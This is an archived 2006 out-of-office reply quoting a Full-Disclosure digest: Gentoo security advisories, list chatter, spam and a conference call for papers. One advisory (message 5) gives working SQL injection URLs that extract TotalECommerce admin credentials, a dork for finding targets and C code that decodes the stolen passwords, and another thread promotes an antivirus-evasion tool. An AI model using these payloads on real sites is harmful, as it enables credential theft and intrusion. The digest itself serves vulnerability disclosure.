lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun Mar 5 12:01:37 2006 From: DMCCOY at bbl-inc.com (DONNY MCCOY) Subject: Re: Full-Disclosure Digest, Vol 13, Issue 8 I will be in Denver through Thursday and will return to Syracuse on Friday. I will check voicemail and e-mail periodically as time allows. If your e-mail is urgent please contact the help desk in Syracuse at x19511. Thanks. Donny >>> full-disclosure 03/05/06 07:00 >>> Send Full-Disclosure mailing list submissions to full-disclosure@...ts.grok.org.uk To subscribe or unsubscribe via the World Wide Web, visit https://lists.grok.org.uk/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request@...ts.grok.org.uk You can reach the person managing the list at full-disclosure-owner@...ts.grok.org.uk When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you. Today's Topics: 1. Re: DSplit - Tiny AV signatures Detector (ad@...poverflow.com) 2. Re: DSplit - Tiny AV signatures Detector (ad@...poverflow.com) 3. Re: DSplit - Tiny AV signatures Detector (Alexander Hristov) 4. [ GLSA 200603-01 ] WordPress: SQL injection vulnerability (Thierry Carrez) 5. Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability. (nukedx@...edx.com) 6. [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in included XPdf code (Thierry Carrez) 7. [ GLSA 200603-03 ] MPlayer: Multiple integer overflows (Thierry Carrez) 8. Please remove me from the list (W1nd man) 9. Re: Please remove me from the list (Alexander Hristov) 10. (no subject) (Steven Rakick) 11. Re: (no subject) (Steven Rakick) 12. Re: (no subject) (PERFECT.MATERIAL) 13. HITBSecConf2006 - Malaysia: Call for Papers (Praburaajan) ---------------------------------------------------------------------- Message: 1 Date: Sat, 04 Mar 2006 13:09:57 +0100 From: "ad@...poverflow.com" <ad@...poverflow.com> Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector To: Alexander Hristov <joffer@...il.com> Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>, bugtraq@...urityfocus.com Message-ID: <44098395.6010604@...poverflow.com> Content-Type: text/plain; charset=ISO-8859-1 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 yeah already knowing they are most fucking bastards Alexander Hristov wrote: > Clamav detects it and can unrar it with the unrar module > > On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote: DSplit > is the small brother of an old tool known as UKsplitter wich is now > abandonned, does not work in vmware, fails to run under windows > 2003. > > DSplit has been coded for persons like me, targeted by AV firms and > I'm not responsible of the bad uses of it, I recall this method is > known since a long time and it's up to the AV firms to review their > detections software. > > http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm > http://getdsplit.class101.org > > usual critics , flames, can be directly sent to the Recycle Bin :> >>> > _______________________________________________ Full-Disclosure - > We believe in it. Charter: > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and > sponsored by Secunia - http://secunia.com/ >>> > >> -- Best Regards, Aleksander Hristov < root at securitydot.net > < >> http://securitydot.net > > > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBRAmDlK+LRXunxpxfAQLmag/8D32IgYedMC/LKtfLKeNv/Dafq9i2NTKu Hsns+6DpLvC5QlOUWUixfok2Nici4lp5dy/xF8D01tqgh3gKFnmv2u0dqjxj6w4K VeZC2teXcYndCWrMDCX+3HFcT4+ZUjkMjGixAwnQhAuIsstQ5pP9pfOT+3PrZFeE Li8IUqFzUL+sUkMhNeZm51mPF69nHeGTRYY9mKKploXeczCpH33EGjeMoDynwKwp VPESww9avNd9AiCQ+bvE9Eeh1+kihcJwwyFfWqd64E4C3L85Cr+GqQ+EzQMp/ZmW Bq4ETGD5En02DnHo8+S152VisipIKgWZpzlzgTlFTkyuDnh+aS5VH1ZJGoiMhONo mNrDe45a3G2r6t3NA/PRJLocKrnrsXeGw7EqQ52GJ9sWrBXT+yJ/CbAZ6yg0ToVU 7zB8ggAsuedNKPCG3LZH/w5eDErFlG+c9pDzrvUv4NxR1BDRfPMlsSYcAR7zq9tf q/I1fZO43hT3nSyukT8NNB1vN7S7J6Zw2Djh6jEjyPwefEnbFmd3Au1zF+tR6qX1 mkScSpoMgbJKcFkk8U2ZAskx18qHvkalKjnjbqxctigQ2sTf4FLtJlCwF5ux6Rld Ko5Bs/yIdHr8b0l7r+v1Ek53P/BqtU+3QUC5y3maDSpK81VRlx3mI1Z3IWrrsUuA KMruj3WAFys= =+V3s -----END PGP SIGNATURE----- ------------------------------ Message: 2 Date: Sat, 04 Mar 2006 13:16:33 +0100 From: "ad@...poverflow.com" <ad@...poverflow.com> Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector To: Alexander Hristov <joffer@...il.com> Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>, bugtraq@...urityfocus.com Message-ID: <44098521.6010509@...poverflow.com> Content-Type: text/plain; charset=ISO-8859-1 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 and it clearly shows clamav is a crap antivirus where the tools like DSplit are a problem for them, and they will detect DSplit when they can't find a better way to detect virus. Alexander Hristov wrote: > Clamav detects it and can unrar it with the unrar module > > On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote: DSplit > is the small brother of an old tool known as UKsplitter wich is now > abandonned, does not work in vmware, fails to run under windows > 2003. > > DSplit has been coded for persons like me, targeted by AV firms and > I'm not responsible of the bad uses of it, I recall this method is > known since a long time and it's up to the AV firms to review their > detections software. > > http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm > http://getdsplit.class101.org > > usual critics , flames, can be directly sent to the Recycle Bin :> >>> > _______________________________________________ Full-Disclosure - > We believe in it. Charter: > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and > sponsored by Secunia - http://secunia.com/ >>> > >> -- Best Regards, Aleksander Hristov < root at securitydot.net > < >> http://securitydot.net > > > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0 gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG 59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac 2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx 9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH RDdNjcudUuw= =iAHW -----END PGP SIGNATURE----- ------------------------------ Message: 3 Date: Sat, 4 Mar 2006 14:41:45 +0200 From: "Alexander Hristov" <joffer@...il.com> Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector To: "ad@...poverflow.com" <ad@...poverflow.com> Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>, bugtraq@...urityfocus.com Message-ID: <734063a30603040441v3beb90d5n7faab639859c8dd7@...l.gmail.com> Content-Type: text/plain; charset=ISO-8859-1 Well clamav is the best AV for no money and its very good developed again for no money :) On 3/4/06, ad@...poverflow.com <ad@...poverflow.com> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > and it clearly shows clamav is a crap antivirus where the tools like > DSplit are a problem for them, > and they will detect DSplit when they can't find a better way to > detect virus. > > > > Alexander Hristov wrote: > > Clamav detects it and can unrar it with the unrar module > > > > On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote: DSplit > > is the small brother of an old tool known as UKsplitter wich is now > > abandonned, does not work in vmware, fails to run under windows > > 2003. > > > > DSplit has been coded for persons like me, targeted by AV firms and > > I'm not responsible of the bad uses of it, I recall this method is > > known since a long time and it's up to the AV firms to review their > > detections software. > > > > http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm > > http://getdsplit.class101.org > > > > usual critics , flames, can be directly sent to the Recycle Bin :> > >>> > > _______________________________________________ Full-Disclosure - > > We believe in it. Charter: > > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and > > sponsored by Secunia - http://secunia.com/ > >>> > > > >> -- Best Regards, Aleksander Hristov < root at securitydot.net > < > >> http://securitydot.net > > > > > > > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.2 (MingW32) > > iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX > OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0 > gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq > GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H > DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m > uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG > 59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac > 2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx > 9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h > TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb > rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH > RDdNjcudUuw= > =iAHW > -----END PGP SIGNATURE----- > > -- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net > ------------------------------ Message: 4 Date: Sat, 04 Mar 2006 16:45:31 +0100 From: Thierry Carrez <koon@...too.org> Subject: [Full-disclosure] [ GLSA 200603-01 ] WordPress: SQL injection vulnerability To: gentoo-announce@...ts.gentoo.org Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, security-alerts@...uxsecurity.com Message-ID: <4409B61B.5060903@...too.org> Content-Type: text/plain; charset="iso-8859-1" - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200603-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WordPress: SQL injection vulnerability Date: March 04, 2006 Bugs: #121661 ID: 200603-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== WordPress is vulnerable to an SQL injection vulnerability. Background ========== WordPress is a PHP and MySQL based content management and publishing system. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-apps/wordpress <= 1.5.2 >= 2.0.1 Description =========== Patrik Karlsson reported that WordPress 1.5.2 makes use of an insufficiently filtered User Agent string in SQL queries related to comments posting. This vulnerability was already fixed in the 2.0-series of WordPress. Impact ====== An attacker could send a comment with a malicious User Agent parameter, resulting in SQL injection and potentially in the subversion of the WordPress database. This vulnerability wouldn't affect WordPress sites which do not allow comments or which require that comments go through a moderator. Workaround ========== Disable or moderate comments on your WordPress blogs. Resolution ========== All WordPress users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.1" Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200603-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@...too.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 256 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/89aced5d/signature-0001.bin ------------------------------ Message: 5 Date: Sat, 04 Mar 2006 16:26:07 +0200 From: nukedx@...edx.com Subject: [Full-disclosure] Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability. To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Message-ID: <20060304162607.2lyie75fm1m4gwow@...mail.nukedx.com> Content-Type: text/plain; charset=ISO-8859-9 --Security Report-- Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 04/03/06 04:36 AM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@...edx.com Web: http://www.nukedx.com } --- Vendor: TotalECommerce (http://www.totalecommerce.com) Version: 1.0 and prior version must be affected. About: Via this method remote attacker can inject arbitrary SQL queries to id parameter in index.asp Level: Critical --- How&Example: GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL] EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha+from+administradores EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login, login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login, login,login,login,login,login,login,login+from+administradores with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name [PageID]: must be working page id you can get some from frontpage. --- Timeline: * 04/03/2006: Vulnerability found. * 04/03/2006: Could not contact with vendor. * 04/03/2006: File closed. --- Exploit&Decrypter: http://www.nukedx.com/?getxpl=18 --- Dorks: intext:"totalecommerce" --- Original advisory: http://www.nukedx.com/?getxpl=18 --- Decrypter source in C --- /********************************************* * TotalECommerce PWD Decrypter * * Coded by |SaMaN| for nukedx * * http://www.k9world.org * * IRC.K9World.Org * *Advisory: http://www.nukedx.com/?viewdoc=18 * **********************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> int main() { char buf[255]; char buf2[255]; char buf3[255]; char *texto; char *vcrypt; int i,x,z,t = 0; char saman; texto = buf; vcrypt = buf2; printf("%s", "|=------------------------------------=|\n"); printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n"); printf("%s", "|=------------------------------------=|\n\n"); printf("%s", "Enter crypted password: "); scanf("%200s", buf); if (!texto) vcrypt = ""; for (i = 0; i < strlen(texto); i++) { if ((vcrypt == "") || (i > strlen(texto))) x = 1; else x = x + 1; t = buf[i]; z = 255 - t; saman = toascii(z); snprintf(buf3, 250, "%c", saman); strncat(buf2, buf3, 250); } printf("Result: %s\n", buf2); return; } ---End of code--- Greets to: |SaMaN| ------------------------------ Message: 6 Date: Sat, 04 Mar 2006 17:32:34 +0100 From: Thierry Carrez <koon@...too.org> Subject: [Full-disclosure] [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in included XPdf code To: gentoo-announce@...ts.gentoo.org Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, security-alerts@...uxsecurity.com Message-ID: <4409C122.4090103@...too.org> Content-Type: text/plain; charset="iso-8859-1" - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200603-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: teTeX, pTeX, CSTeX: Multiple overflows in included XPdf code Date: March 04, 2006 Bugs: #115775 ID: 200603-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== CSTeTeX, pTeX, and teTeX include vulnerable XPdf code to handle PDF files, making them vulnerable to the execution of arbitrary code. Background ========== teTex is a complete TeX distribution. It is used for creating and manipulating LaTeX documents. CSTeX is a TeX distribution with Czech and Slovak support. pTeX is and ASCII publishing TeX distribution. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/tetex < 2.0.2-r8 >= 2.0.2-r8 2 app-text/cstetex < 2.0.2-r2 >= 2.0.2-r2 3 app-text/ptex < 3.1.5-r1 >= 3.1.5-r1 ------------------------------------------------------------------- 3 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== CSTeX, teTex, and pTeX include XPdf code to handle PDF files. This XPdf code is vulnerable to several heap overflows (GLSA 200512-08) as well as several buffer and integer overflows discovered by Chris Evans (CESA-2005-003). Impact ====== An attacker could entice a user to open a specially crafted PDF file with teTeX, pTeX or CSTeX, potentially resulting in the execution of arbitrary code with the rights of the user running the affected application. Workaround ========== There is no known workaround at this time. Resolution ========== All teTex users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/tetex-2.0.2-r8" All CSTeX users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/cstetex-2.0.2-r2" All pTeX users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/ptex-3.1.5-r1" References ========== [ 1 ] CVE-2005-3193 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3193 [ 2 ] GLSA 200512-08 http://www.gentoo.org/security/en/glsa/glsa-200512-08.xml [ 3 ] CESA-2005-003 http://scary.beasts.org/security/CESA-2005-003.txt Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200603-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@...too.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 256 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/5e29724b/signature-0001.bin ------------------------------ Message: 7 Date: Sat, 04 Mar 2006 18:26:18 +0100 From: Thierry Carrez <koon@...too.org> Subject: [Full-disclosure] [ GLSA 200603-03 ] MPlayer: Multiple integer overflows To: gentoo-announce@...ts.gentoo.org Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, security-alerts@...uxsecurity.com Message-ID: <4409CDBA.8060405@...too.org> Content-Type: text/plain; charset="iso-8859-1" - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200603-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: MPlayer: Multiple integer overflows Date: March 04, 2006 Bugs: #115760, #122029 ID: 200603-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== MPlayer is vulnerable to integer overflows in FFmpeg and ASF decoding that could potentially result in the execution of arbitrary code. Background ========== MPlayer is a media player capable of handling multiple multimedia file formats. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-video/mplayer < 1.0.20060217 >= 1.0.20060217 Description =========== MPlayer makes use of the FFmpeg library, which is vulnerable to a heap overflow in the avcodec_default_get_buffer() function discovered by Simon Kilvington (see GLSA 200601-06). Furthermore, AFI Security Research discovered two integer overflows in ASF file format decoding, in the new_demux_packet() function from libmpdemux/demuxer.h and the demux_asf_read_packet() function from libmpdemux/demux_asf.c. Impact ====== An attacker could craft a malicious media file which, when opened using MPlayer, would lead to a heap-based buffer overflow. This could result in the execution of arbitrary code with the permissions of the user running MPlayer. Workaround ========== There is no known workaround at this time. Resolution ========== All MPlayer users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-video/mplayer-1.0.20060217" References ========== [ 1 ] CVE-2005-4048 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048 [ 2 ] CVE-2006-0579 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579 [ 3 ] GLSA 200601-06 http://www.gentoo.org/security/en/glsa/glsa-200601-06.xml Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200603-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@...too.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 256 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/568fbea3/signature-0001.bin ------------------------------ Message: 8 Date: Sat, 4 Mar 2006 22:16:10 +0200 From: W1nd man <w1ndm4n@...la.com> Subject: [Full-disclosure] Please remove me from the list To: <full-disclosure@...ts.grok.org.uk> Message-ID: <1141503369.961000-13997465-23441@...la.com> Content-Type: text/plain; charset="us-ascii" An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f69d9753/attachment-0001.html ------------------------------ Message: 9 Date: Sun, 5 Mar 2006 03:52:28 +0200 From: "Alexander Hristov" <joffer@...il.com> Subject: Re: [Full-disclosure] Please remove me from the list To: "W1nd man" <w1ndm4n@...la.com> Cc: full-disclosure@...ts.grok.org.uk Message-ID: <734063a30603041752v7a8cc6efnd28861cae0f8be32@...l.gmail.com> Content-Type: text/plain; charset=ISO-8859-1 U can remove yourself from here : https://lists.grok.org.uk/mailman/listinfo/full-disclosure On 3/4/06, W1nd man <w1ndm4n@...la.com> wrote: > > > > Please remove me from the list > > > ________________________________ > > Walla! Mail - get your free 3G mail today > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net > ------------------------------ Message: 10 Date: Sat, 4 Mar 2006 18:01:51 -0800 From: Steven Rakick <stevenrakick@...oo.com> Subject: [Full-disclosure] (no subject) To: full-disclosure@...ts.grok.org.uk Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net> Content-Type: text/plain; charset="iso-8859-1" Hello HACKERZ!, Your personal DONGEZ to this message. Sincerely, BanHaus manager -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f1416faf/attachment-0001.html ------------------------------ Message: 11 Date: Sat, 4 Mar 2006 20:28:32 -0800 (PST) From: Steven Rakick <stevenrakick@...oo.com> Subject: Re: [Full-disclosure] (no subject) To: full-disclosure@...ts.grok.org.uk Message-ID: <20060305042832.34191.qmail@...53201.mail.yahoo.com> Content-Type: text/plain; charset=iso-8859-1 Not that it matters but... Received: from www.c0replay.net (unknown [206.251.72.74]) by lists.grok.org.uk (Postfix) with ESMTP id 739EF127 for <full-disclosure@...ts.grok.org.uk>; Sun, 5 Mar 2006 02:02:03 +0000 (GMT) Date: Sat, 4 Mar 2006 18:01:51 -0800 To: full-disclosure@...ts.grok.org.uk From: Steven Rakick <stevenrakick@...oo.com> Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net> X-Priority: 3 X-Mailer: PHPMailer [version 1.73] __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ------------------------------ Message: 12 Date: Sun, 5 Mar 2006 00:34:03 -0500 From: PERFECT.MATERIAL <perfect.material@...il.com> Subject: Re: [Full-disclosure] (no subject) To: "Steven Rakick" <stevenrakick@...oo.com> Cc: full-disclosure@...ts.grok.org.uk Message-ID: <631ac1d90603042134n7a22e7aale14d2aa7914dda58@...l.gmail.com> Content-Type: text/plain; charset="iso-8859-1" Dick Breath, You should sign your electronic mail with some unhackable crypto technology. That way you will never need to show off your cut and paste technology to the others. You are irresponsible. Not that it matters but... PERFECT.MATERIAL On 3/4/06, Steven Rakick <stevenrakick@...oo.com> wrote: > > Not that it matters but... > > Received: from www.c0replay.net (unknown > [206.251.72.74]) > by lists.grok.org.uk (Postfix) with ESMTP id 739EF127 > for <full-disclosure@...ts.grok.org.uk>; > Sun, 5 Mar 2006 02:02:03 +0000 (GMT) > Date: Sat, 4 Mar 2006 18:01:51 -0800 > To: full-disclosure@...ts.grok.org.uk > From: Steven Rakick <stevenrakick@...oo.com> > Message-ID: > <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net> > X-Priority: 3 > X-Mailer: PHPMailer [version 1.73] > > > __________________________________________________ > Do You Yahoo!? > Tired of spam? Yahoo! Mail has the best spam protection around > http://mail.yahoo.com > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060305/d547fd1e/attachment-0001.html ------------------------------ Message: 13 Date: Sun, 05 Mar 2006 13:34:43 +0800 From: Praburaajan <prabu@...kinthebox.org> Subject: [Full-disclosure] HITBSecConf2006 - Malaysia: Call for Papers To: full-disclosure@...ts.grok.org.uk, dailydave@...ts.immunitysec.com, pen-test@...urityfocus.com, bugtraq@...urityfocus.com, Voipsec@...psa.org, submit@...w0rm.com, webappsec@...urityfocus.com, ipv6@...f.org, security-basics@...urityfocus.com Message-ID: <440A7873.4000202@...kinthebox.org> Content-Type: text/plain; charset=windows-1252; format=flowed Greetings from Hack in The Box -- We are pleased to announce that the Call for Paper (CfP) for HITBSecConf2006 - Malaysia is now open! Set to take place from September 18th - 21st 2006 at The Westin Kuala Lumpur, this years conference promises to once again deliver an International deep-knowledge security conference. HITBSecConf has been described as "the most intimate of hacker gatherings" and is the largest network security conference in Asia! SUBMISSION HITBSecConf is a deep-knowledge technical conference. Talks that are more technical or that discuss new and never before seen attack methods are of more interest than a subject that has been covered several times before. Summaries not exceeding 250 words should be submitted (in plain text format) to cfp -at- hackinthebox.org for review and possible inclusion in the programme. Submissions are due no later than 1st of May 2006 TOPICS Topics of interest include, but are not limited to the following: * Analysis of network and security vulnerabilities * Firewall technologies * Intrusion detection * Data Recovery and Incident Response * GPRS, 3G and CDMA Security * Identification and Entity Authentication * Network Protocol and Analysis * Smart Card Security * Virus and Worms * WLAN and Bluetooth Security. * Analysis of malicious code * Applications of cryptographic techniques, * Analysis of attacks against networks and machines * Denial-of-service attacks and countermeasures * File system security * Security in heterogeneous and large-scale environments * Techniques for developing secure systems PLEASE NOTE: We do not accept product or vendor related pitches. If your talk involves an advertisement for a new product or service your company is offering, please do not submit. Your submission should include: * Name, title, address, email and phone/contact number * Draft of the proposed presentation (in PDF or PowerPoint format), proof of concept for tools and exploits, etc. * Short biography, qualification, occupation, achievement and affiliations (limit 150 words). * Summary or abstract for your presentation (limit 250 words) * Time (45-60 minutes including time for discussion and questions) * Technical requirements (video, internet, wireless, audio, etc.) Each non-resident speaker will receive accommodation for 3 nights at The Westin Kuala Lumpur. For each non-resident speaker, HITB will cover travel expenses (through our airline partner, Malaysia Airlines) up to USD 1,000.00. HITBSecConf2006 CTF Daemons/Flags As part of our annual conference, HITB organizes an attack and defense "hack-game" commonly referred to as *Capture The Flag* or CTF. As part of our continued efforts to improve on the game and raise the bar each year, we are inviting speakers to contribute a daemon and exploit for this years CTF competition. For further details on the submission process, kindly e-mail dinesh -at- hackinthebox.org or ctfinfo -at- hackinthebox.org. On behalf of The HITB Team, we thank you and look forward to receiving your submissions! See you guys in September! HITBSecConf2006 - Malaysia: Deep-Knowledge Network Security http://conference.hackinthebox.org/hitbsecconf2006kl/ http://conference.hitb.org/hitbsecconf2006kl/ ------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ End of Full-Disclosure Digest, 